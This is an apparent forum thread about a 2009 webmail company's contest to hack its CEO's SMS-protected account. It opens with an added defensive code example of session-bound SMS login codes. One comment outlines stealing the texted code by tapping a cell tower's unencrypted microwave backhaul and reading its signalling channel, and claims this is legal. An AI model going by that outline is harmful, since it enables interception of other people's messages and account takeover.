In order to compromise this system without actually rooting the server, the hax0r has to: know the login & password, have the cell phone or hax0rz the phone company, AND know the session code sent to the end user's browser. While not actually impossible, it's a damned sight more difficult than just a username/password!

Usually, the only way to accomplish these is to either BE the person, or steal their phone AND know their login/password. And if the phone is stolen, the rightful owner only needs to make a phone call to report it stolen, so the attack window is very small.

This is a GOOD thing folks!
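The three-step flow sketched in the comment above, as an added example that is not code from the original post, from StrongWebmail or from Telesign. It assumes a constructed user record, an injected `send_sms` callback standing in for the real SMS gateway, a five-minute code lifetime and a three-attempt limit; all of those are assumptions. The point it adds beyond the comment is the binding: the code is keyed to the session identifier, so a code texted for one login session does not verify in another, and it is consumed on first use.

```python
"""Session-bound SMS one-time-code login (added example, not the page's own code)."""
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300    # assumption: a texted code is valid for five minutes
MAX_CODE_ATTEMPTS = 3     # assumption: three wrong codes abandon the session


def _hash_password(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 with a per-user salt; never store the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user database for the example; the phone number is not a real one.
_SALT = b"constructed-per-user-salt"
USERS = {
    "darren": {
        "salt": _SALT,
        "pw_hash": _hash_password("correct horse battery staple", _SALT),
        "phone": "+15550100",
    }
}


class SmsLogin:
    def __init__(self, send_sms):
        self.send_sms = send_sms   # callable(phone, text); injected so this runs offline
        self.sessions = {}         # session_id -> pending-login state

    def start(self, username: str) -> str:
        """Step 1: username submitted. Mint a session and text a code bound to it."""
        session_id = secrets.token_urlsafe(16)
        code = f"{secrets.randbelow(10**6):06d}"
        # A session is created whether or not the user exists, so the response
        # does not let an attacker enumerate valid login names.
        self.sessions[session_id] = {
            "username": username,
            # The code is stored as an HMAC keyed by the session id, so it can only
            # ever verify within this session, and a DB leak does not expose it.
            "code_hash": hmac.new(session_id.encode(), code.encode(), "sha256").digest(),
            "expires": time.time() + CODE_TTL_SECONDS,
            "attempts": 0,
            "password_ok": False,
        }
        user = USERS.get(username)
        if user is not None:
            self.send_sms(user["phone"], f"Your login code is {code}")
        return session_id

    def check_password(self, session_id: str, password: str) -> bool:
        """Step 2: password verified against the account named in this session."""
        s = self.sessions.get(session_id)
        user = USERS.get(s["username"]) if s else None
        if s is None or user is None:
            return False
        ok = hmac.compare_digest(_hash_password(password, user["salt"]), user["pw_hash"])
        s["password_ok"] = ok
        return ok

    def check_code(self, session_id: str, code: str) -> bool:
        """Step 3: code checked against session, login, expiry and attempt budget."""
        s = self.sessions.get(session_id)
        if s is None or not s["password_ok"]:
            return False                    # wrong order, or unknown session
        if time.time() > s["expires"]:
            del self.sessions[session_id]   # stale code: start over
            return False
        s["attempts"] += 1
        given = hmac.new(session_id.encode(), code.encode(), "sha256").digest()
        if hmac.compare_digest(s["code_hash"], given):
            del self.sessions[session_id]   # one-time: a captured code cannot be replayed
            return True
        if s["attempts"] >= MAX_CODE_ATTEMPTS:
            del self.sessions[session_id]   # no brute-forcing a six-digit code
        return False


if __name__ == "__main__":
    outbox = []
    login = SmsLogin(lambda phone, text: outbox.append((phone, text)))
    sid = login.start("darren")
    assert login.check_password(sid, "correct horse battery staple")
    print("logged in:", login.check_code(sid, outbox[-1][1].split()[-1]))
```

Binding the code to the session is what turns a stolen SMS into a narrower problem: an attacker who intercepts the text still needs the victim's password and the victim's own session cookie, not just any session of their own.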

Re:The Catch (5, Interesting)

digitalchinky (650880) | more than 5 years ago | (#28230847)

Damn, I wish I lived in the US. This is easy money.

For 10 grand in prize money - wow, they didn't think about this very well. The kit you need is all available on eBay for less than a grand. I already have the modems, EDT data capture cards, a couple of Sun Ultras (old, but they do the job dependably), a spectrum analyser, antennas, level converters, up/down converter, transceivers and a bunch of cables to connect it all together.

It would take half a day at most. Camp outside his office or home, figure out which cell tower he is on (line of sight) and poke an antenna in the path of the microwave link the tower uses to talk to the exchange. (This traffic is all unencrypted, bog standard T1/E1 stuff) - do whatever you need to do to trigger the text alert, suck down the CCITT-7 channel, then pick through the SMS payload until you find the code. Log in and take the cash.

Legal? I'd say absolutely, you haven't actually monitored a 'cell phone' at all, nor have you tuned your receive gear to any part of the spectrum used by a cell phone. All you've done is read the out of band signalling system on an entirely separate trunk over a link, that is not breaking the 'do not monitor phone calls' rule. (No such rules exist where I live, mostly because radio is still thought of as magic by the Government)

RULES? (0)

Anonymous Coward | more than 5 years ago | (#28229673)

one question stands out in my mind.... what WERE the rules to the contest? and was it stated they could be changed at any time?

Hate to be a pedant.... But, (1, Offtopic)

davidsyes (765062) | more than 5 years ago | (#28229695)

"break-in'", or "break-in"?

This is annoying, just as is "Logout", which is best thought of as an act, so it should be written as "Log out", nnnnnnnoTTTTT "Logout". When I see "logout" I think "oh, a PLACE". When I see "Log out", I thank the smarter site editor and imagine an act, not a place... But that's just me...

Re:Hate to be a pedant.... But, (0)

Anonymous Coward | more than 5 years ago | (#28229715)

Huh?

Re:Hate to be a pedant.... But, (-1, Troll)

davidsyes (765062) | more than 5 years ago | (#28229807)

Oh, whoever moderated me 0, troll is just being a kessekkida/jipshekki... Try to educate some bastards, and they get all torqued out...

Re:Hate to be a pedant.... But, (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#28229897)

Well you fucking deserved it, idiot.

Re:Hate to be a pedant.... But, (1)

sdBlue (844590) | more than 5 years ago | (#28230189)

Just to pedant you back... :) Out of curiosity, what place do you think of when you see "logout"? It's so common these days, and after all, isn't "common usage" what defines the english language?

Re:Hate to be a pedant.... But, (0)

Anonymous Coward | more than 5 years ago | (#28229731)

This comment is a good vision test. ;)

Re:Hate to be a pedant.... But, (0)

Anonymous Coward | more than 5 years ago | (#28230039)

Haha, his marks. This reminds me of back in the day with some mIRC client that was popular, and flooding rooms with a name that was a mixture of singles and doubles like "''"''''"""""""' . With the popular clients the ops would type your name in to kick you or ban you, but they couldn't type your name in because it was indecipherable, and they couldn't select your name in the name list on the side (just because it wouldn't let you) and they couldn't select your name in the chat itself (because it was moving as you flooded). Always a good trick.

Re:Hate to be a pedant.... But, (1)

geekprime (969454) | more than 5 years ago | (#28229827)

@davidsyes

No, that's just you.

Sorry.

Re:Hate to be a pedant.... But, (1)

artor3 (1344997) | more than 5 years ago | (#28230089)

Yeah, and blackbirds are just black birds, so it should be written that way!

Or, you could learn English as it's actually used, instead of pretending it's a programming language.

Just Kidnap the Bastard (2, Interesting)

LSDelirious (1569065) | more than 5 years ago | (#28229703)

Just make sure Darren Berkovitz has his phone on him. There's nothing in the rules against it...

Webmail can be secured. It's simple. (1)

symbolset (646467) | more than 5 years ago | (#28229857)

All you need are users who are willing to submit to invasive biometrics and can remember a few hundred pages of random one-time pad, an OS with no open ports, a data entry device that can't be subverted, a display device that projects no EMR, a single fiber from the reading device to the server protected by quantum encryption, gold shielding and armed guards for everybody involved including every developer who ever touched the code and every engineer who thought about the hardware, a whitelist both of senders and sending IP's all on a similarly secured network...

No, never mind. I don't really know how to do this. Do not use the freaking Internet for stuff that must be secure.

Re:Webmail can be secured. It's simple. (0)

Anonymous Coward | more than 5 years ago | (#28229943)

All you need are users who are willing to submit to invasive biometrics and can remember a few hundred pages of random one-time pad, an OS with no open ports, a data entry device that can't be subverted, a display device that projects no EMR, a single fiber from the reading device to the server protected by quantum encryption, gold shielding and armed guards for everybody involved including every developer who ever touched the code and every engineer who thought about the hardware, a whitelist both of senders and sending IP's all on a similarly secured network...

Get ready for a call from the Feds, because you just leaked the specs for Obama's BlackBerry!

Oh, no. (1)

symbolset (646467) | more than 5 years ago | (#28230375)

Obama's CrackBerry has even better security: it's being operated by somebody who's not stupid.

/Was that a state secret? Should I not have said that?

Wha? (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#28229861)

"last changed 4-Jun-2009"
http://toolbar.netcraft.com/site_report?url=http://www.StrongWebmail.com

RE: CEO Darren Berkovitz -- Ass Wipe (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#28229905)

What a Tweerp! Deserves all the "F@@k You" salutations from the real winners.

Point of Order... (2, Insightful)

ae1294 (1547521) | more than 5 years ago | (#28230105)

Void where prohibited, taxed, or otherwise restricted by law. Subject to all federal, state, and local laws. This Contest is open to all legal residents of the United States and the District of Columbia, and U.S. Military personnel (and their families) with APO/FPO addresses, who are eighteen (18) years of age or older.

Void where prohibited? - Hacking? Nah...
Taxed? - Hacking? - Donno it might be now...
Otherwise restricted by law? - Hacking? Nah....
Subject to all federal, state, and local laws? - Hacking? Nah...
Only open to US residents? - SURE, "all" the best hackers are US-born.
18 Years of Age. - Oh yes, for "all" the best hackers are 18 and older because they have girlfriends, jobs and a shit-ton more to lose.

Gezzzzz come on now... If you try and claim the 10 grand you're going to get 30 years in federal prison.....
No wonder they didn't think anyone would try for the 10 grand.

Re:Point of Order... (1)

ae1294 (1547521) | more than 5 years ago | (#28230133)

Taxed? - Hacking? - Donno it might be now...

wait wait wait... are they saying VOID where the proceeds of the contest are TAXED? That would be everywhere in the US!

Re:Point of Order... (1)

benjamindees (441808) | more than 5 years ago | (#28230237)

The DMCA is probably the only law broad enough to include hacking that is expressly permitted. And, even then, calendar entries probably don't rise to the level of copyright protection. So I don't see what law would have been broken.

Re:Point of Order... (1)

ae1294 (1547521) | more than 5 years ago | (#28230285)

Are you a lawyer? I'm not but I am pretty sure there are anti-hacking laws... Where is a good lawyer when you need one.... for free.... at 1am on a Friday night.... while in jail....

Someone needs to summon that NC-lawyer guy from his bed... Maybe prank call him and tell him the RIAA wants to settle to get him up on here to chime in.

I read over their rules and it was extremely iffy looking to me... But I'm no Hacker, I mean lawyer so ehh...

Anyway this story is 1am3, I will never use this company's product as I prefer an extremely old alpha copy of qmail and outlook express.

Re:Point of Order... (1)

ae1294 (1547521) | more than 5 years ago | (#28230351)

Anyway this story is 1am3, I will never use this company's product as I prefer an extremely old alpha copy of qmail and outlook express.

If you were wondering... I was taught to rename all of my executables on my server and replace them with very small shell scripts that mock all the hackers who gain root just before kill -9'ing their pids with a very meaty grep command...

They think it's some sort of "chat with lisa" joke type server.. they are wrong... Dead Wrong...

Re:Point of Order... (3, Informative)

pavon (30274) | more than 5 years ago | (#28230603)

There are anti-hacker laws, but they generally read along the lines of

Whoever having knowingly accessed a computer without authorization or exceeding authorized access...
Whoever intentionally, without authorization to access any nonpublic computer ...
Whoever knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access

(From 18.USC 1030 [cornell.edu] , the law Lori Drew was charged with)

Darren Berkovitz gave explicit permission when he announced this contest, so they had authorization to attempt to gain access by any means allowed by the rules. The only restrictions given were that you had to register first, and you couldn't get help from a StrongWebmail employee.

The rest of the rules looked innocuous to me. Most of it was standard boilerplate which is required by law for any contest - a cereal box prize will have the same language. The last paragraph of the third section was all just Disclaimers of Liabilities - we aren't responsible for network congestion if someone tries to DoS us to win the prize, we aren't responsible if you download some script-kiddy software to use in the competition and it screws up your computer, etc.

If you did clearly break the rules then you could be charged under 18 USC 1030, as the access was unauthorized, knowing (you agreed to the rules), and fraudulent (you were attempting to cheat them out of prize money), and crossed state lines. But they weren't tricky rules to follow.

Re:Point of Order... (1)

amicusNYCL (1538833) | more than 5 years ago | (#28230755)

Only open to US residents? - SURE, "all" the best hackers and US born.
18 Years of Age. - O yes, for "all" the best hackers are 18 and older because they have girlfriends, jobs and a shit-ton more to loose.

They have to limit their liability by only allowing American adults, a minor can't enter into a contract so there's no point in even allowing them to compete. They probably need to be American just in case the company decides to sue them. As for hacking being illegal, it's not exactly illegal when you have permission to do it. The definition of hacking includes lack of authorization to do what you're doing. If you have authorization, legally speaking you're not hacking.

Re:Point of Order... (1, Informative)

Anonymous Coward | more than 5 years ago | (#28230849)

For the love of anything anyone considers holy, don't mod this "Insightful."

Funny perhaps, in a sort of tongue-in-cheek way...but seriously, all of those restrictions are generally required for any kind of contest with a large cash reward. It's just to remove any liability from the company for refusing would-be contest winners that are not permitted through laws, or for any actions of individuals illegally participating.

Hacking (0)

Anonymous Coward | more than 5 years ago | (#28230249)

Hacking by definition is gaining "unauthorized access". If you are providing a reward, rules, and encourage people to participate (as in a contest), does it really count as unauthorized access?
